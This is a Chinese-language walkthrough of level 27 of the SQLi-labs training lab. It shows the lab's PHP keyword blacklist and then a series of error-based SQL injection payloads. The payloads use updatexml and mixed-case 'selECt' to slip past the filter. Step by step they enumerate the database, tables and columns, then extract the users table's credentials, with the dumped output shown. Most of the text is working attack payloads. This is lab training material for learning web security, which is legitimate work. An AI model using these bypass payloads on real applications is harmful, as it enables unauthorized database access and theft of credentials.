5.27.第27关 get报错注入 过滤select和union '闭合

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

5.27.1手动注入

（1）判断注入类型、注入点

?id=1'      报错，判断为字符型注入，'闭合
?id=1'or'0  返回id=1数据
?id=2'or'0  返回id=2数据，确定为'闭合

（2）查询数据库名

?id=1'or(updatexml(1,concat(0x7e,(database())),1))or'0

（3）查询表名

?id=1'or(updatexml(1,concat(0x7e,(selECt(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0

（4）查询字段名

?id=1'or(updatexml(1,concat(0x7e,(selECt(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users'))),1))or'0

（5）查询账号密码

?id=1'or(updatexml(1,concat(0x7e,(selECt(substring(group_concat(id,0x7e,username,0x3a,password),1,32))from(users))),1))or'0
?id=1'or(updatexml(1,concat(0x7e,(selECt(substring(group_concat(id,0x7e,username,0x3a,password),32,32))from(users))),1))or'0
?id=1'or(updatexml(1,concat(0x7e,(selECt(substring(group_concat(id,0x7e,username,0x3a,password),63,32))from(users))),1))or'0

1~Dumb:Dumb,2~Angelina:I-kill-you,3~Dummy:p@ssword,4~secure:crppy,5~stupid:stupidity,6~super